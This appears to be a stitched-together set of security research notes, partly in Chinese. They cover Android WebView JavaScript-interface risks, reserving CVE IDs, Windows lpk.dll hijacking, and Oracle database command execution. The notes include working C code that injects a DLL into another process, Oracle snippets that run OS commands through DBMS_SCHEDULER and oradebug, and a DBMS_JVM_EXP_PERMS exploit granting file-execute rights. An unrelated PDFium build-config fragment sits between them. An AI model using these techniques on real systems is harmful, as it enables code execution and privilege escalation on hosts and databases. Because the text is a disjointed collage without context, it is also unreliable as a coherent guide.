public void addJavascriptInterface (Object object, String name) Added in API level 1
Injects the supplied Java object into this WebView. The object is injected into the JavaScript context of the main frame, using the supplied name. This allows the Java object's methods to be accessed from JavaScript. For applications targeted to API level JELLY_BEAN_MR1 and above, only public methods that are annotated with JavascriptInterface can be accessed from JavaScript. For applications targeted to API level JELLY_BEAN or below, all public methods (including the inherited ones) can be accessed, see the important security note below for implications.
Note that injected objects will not appear in JavaScript until the page is next (re)loaded. For example:
1 2 3 4 5 6 7 8 9
classJsObject { @JavascriptInterface public String toString() { return"injectedObject"; } }
This method can be used to allow JavaScript to control the host application. This is a powerful feature, but also presents a security risk for apps targeting JELLY_BEAN or earlier. Apps that target a version later than JELLY_BEAN are still vulnerable if the app runs on a device running Android earlier than 4.2. The most secure way to use this method is to target JELLY_BEAN_MR1 and to ensure the method is called only when running on Android 4.2 or later. With these older versions, JavaScript could use reflection to access an injected object's public fields. Use of this method in a WebView containing untrusted content could allow an attacker to manipulate the host application in unintended ways, executing Java code with the permissions of the host application. Use extreme care when using this method in a WebView which could contain untrusted content. JavaScript interacts with Java object on a private, background thread of this WebView. Care is therefore required to maintain thread safety.
The Java object's fields are not accessible. For applications targeted to API level LOLLIPOP and above, methods of injected Java objects are enumerable from JavaScript. Parameters object the Java object to inject into this WebView's JavaScript context. Null values are ignored. name the name used to expose the object in JavaScript
Give the host application a chance to take over the control when a new url is about to be loaded in the current WebView. If WebViewClient is not provided, by default WebView will ask Activity Manager to choose the proper handler for the url. If WebViewClient is provided, return true means the host application handles the url, while return false means the current WebView handles the url. This method is not called for requests using the POST "method".
IMPORTANT: Once a CVE ID is assigned to your vulnerability, it will not be published in the CVE List until you have submitted a URL pointing to public information about the vulnerability. Without a public reference, the CVE ID will display as "RESERVED" in the CVE List. Please update CVE with a reference to the vulnerability's details as soon as possible. See this FAQ for more information.
只要将 public reference 留空,就可以申请 RESERVED CVE 了。CVE 官方收到请求后会有确认的邮件。
a. The directory from which the application loaded. b. The current directory. c. The system directory. Use the GetSystemDirectory function to get the path of this directory. d. The 16-bit system directory. There is no function that obtains the path of this directory, but it is searched. e. The Windows directory. Use the GetWindowsDirectory function to get the path of this directory. f. The directories that are listed in the PATH environment variable. Note that this does not include the per-application path specified by the App Paths registry key. The App Paths key is not used when computing the DLL search path.
因此把lpk.dll放到运行的程序同一目录即可。
为什么选取lpk.dll
Windows 7 开始,默认已经不加载LPK.dll了,要Windows 7 默认加载LPK.dll 需要修改注册表,导入下面的注册表, 重启后生效
HANDLE process = OpenProcess(PROCESS_ALL_ACCESS, FALSE, procID); if (process == NULL) { printf("Error: the specified process couldn't be found.\n"); }
/* * Get address of the LoadLibrary function. */ LPVOID addr = (LPVOID)GetProcAddress(GetModuleHandle(L"kernel32.dll"), "LoadLibraryA"); if (addr == NULL) { printf("Error: the LoadLibraryA function was not found inside kernel32.dll library.\n"); }
/* * Allocate new memory region inside the process's address space. */ LPVOID arg = (LPVOID)VirtualAllocEx(process, NULL, strlen(buffer), MEM_RESERVE | MEM_COMMIT, PAGE_READWRITE); if (arg == NULL) { printf("Error: the memory could not be allocated inside the chosen process.\n"); }
/* * Write the argument to LoadLibraryA to the process's newly allocated memory region. */ int n = WriteProcessMemory(process, arg, buffer, strlen(buffer), NULL); if (n == 0) { printf("Error: there was no bytes written to the process's address space.\n"); }
/* * Inject our DLL into the process's address space. */ HANDLE threadID = CreateRemoteThread(process, NULL, 0, (LPTHREAD_START_ROUTINE)addr, arg, NULL, NULL); if (threadID == NULL) { printf("Error: the remote thread could not be created.\n"); } else { printf("Success: the remote thread was successfully created.\n"); }
/* * Close the handle to the process, becuase we've already injected the DLL. */ CloseHandle(process);
# Build arguments go here. # See "gn args <out_dir> --list" for available build arguments. use_goma = false # Googlers only. Make sure goma is installed and running first. is_debug = false # Enable debugging features.
pdf_use_skia = true # Set true to enable experimental skia backend. pdf_use_skia_paths = false # Set true to enable experimental skia backend (paths only).
pdf_enable_xfa = true # Set false to remove XFA support (implies JS support). pdf_enable_v8 = true # Set false to remove Javascript support. pdf_is_standalone = true # Set for a non-embedded build. is_component_build = false # Disable component build (must be false) v8_static_library = true
clang_use_chrome_plugins = false # Currently must be false. use_sysroot = false # Currently must be false on Linux, but entirely omitted on windows.
BEGIN DBMS_SCHEDULER.CREATE_PROGRAM ( program_name=> 'MyCmd', program_type=> 'EXECUTABLE', -- Use the ampersand to breakout program_action=> '/tmp/a.sh', enabled=> TRUE, comments=> 'Run a command using shell metacharacters.' ); END; /
SQL> oradebug help HELP [command] Describe one or all commands SETMYPID Debug current process SETOSPID <ospid> Set OS pid of process to debug SETORAPID <orapid> ['force'] Set Oracle pid of process to debug SETORAPNAME <orapname> Set Oracle process name to debug SHORT_STACK Get abridged OS stack CURRENT_SQL Get current SQL DUMP <dump_name> <lvl> [addr] Invoke named dump DUMPSGA [bytes] Dump fixed SGA DUMPLIST Print a list of available dumps EVENT <text> Set trace event in process SESSION_EVENT <text> Set trace event in session DUMPVAR <p|s|uga> <name> [level] Print/dump a fixed PGA/SGA/UGA variable DUMPTYPE <address> <type> <count> Print/dump an address with type info SETVAR <p|s|uga> <name> <value> Modify a fixed PGA/SGA/UGA variable PEEK <addr> <len> [level] Print/Dump memory POKE <addr> <len> <value> Modify memory WAKEUP <orapid> Wake up Oracle process SUSPEND Suspend execution RESUME Resume execution FLUSH Flush pending writes to trace file CLOSE_TRACE Close trace file TRACEFILE_NAME Get name of trace file LKDEBUG Invoke global enqueue service debugger NSDBX Invoke CGS name-service debugger -G <Inst-List | def | all> Parallel oradebug command prefix -R <Inst-List | def | all> Parallel oradebug prefix (return output SETINST <instance# .. | all> Set instance list in double quotes SGATOFILE <SGA dump dir> Dump SGA to file; dirname in double quotes DMPCOWSGA <SGA dump dir> Dump & map SGA as COW; dirname in double quotes MAPCOWSGA <SGA dump dir> Map SGA as COW; dirname in double quotes HANGANALYZE [level] [syslevel] Analyze system hang FFBEGIN Flash Freeze the Instance FFDEREGISTER FF deregister instance from cluster FFTERMINST Call exit and terminate instance FFRESUMEINST Resume the flash frozen instance FFSTATUS Flash freeze status of instance SKDSTTPCS <ifname> <ofname> Helps translate PCs to names WATCH <address> <len> <self|exist|all|target> Watch a region of memory DELETE <local|global|target> watchpoint <id> Delete a watchpoint SHOW <local|global|target> watchpoints Show watchpoints DIRECT_ACCESS <set/enable/disable command | select query> Fixed table access CORE Dump core without crashing process IPC Dump ipc information UNLIMIT Unlimit the size of the trace file PROCSTAT Dump process statistics CALL [-t count] <func> [arg1]...[argn] Invoke function with arguments
功能非常丰富, 下面我们用到的是 CALL 可以直接调用oracle进程使用的函数。
执行的语句
oradebug setmypid; oradebug call system "/usr/bin/whoami >/tmp/ret";
注意
这里权限要求是SYSDBA
双引号里必须是使用TAB而不能使用空格
Linux 和 Windows 下的ORACLE都能利用成功
2. 黑客方法
下面用到的两个方法是David Litchfield 在Blackhat DC 2010 上公开两个方法,通过逆向 发现。结合DBMS_JVM_EXP_PERMS的漏洞可以直接执行系统命令(DBMS_JVM_EXP_PERMS 漏洞 已经被被修复)
1 2 3 4 5 6 7 8 9 10
DECLARE POL DBMS_JVM_EXP_PERMS.TEMP_JAVA_POLICY; CURSOR C1 IS SELECT ‘GRANT’,USER(), ‘SYS’,'java.io.FilePermission’,’<<ALL FILES>>‘,’execute’,'ENABLED’ from dual; BEGIN OPEN C1; FETCH C1 BULK COLLECT INTO POL; CLOSE C1; DBMS_JVM_EXP_PERMS.IMPORT_JVM_PERMS(POL); END; /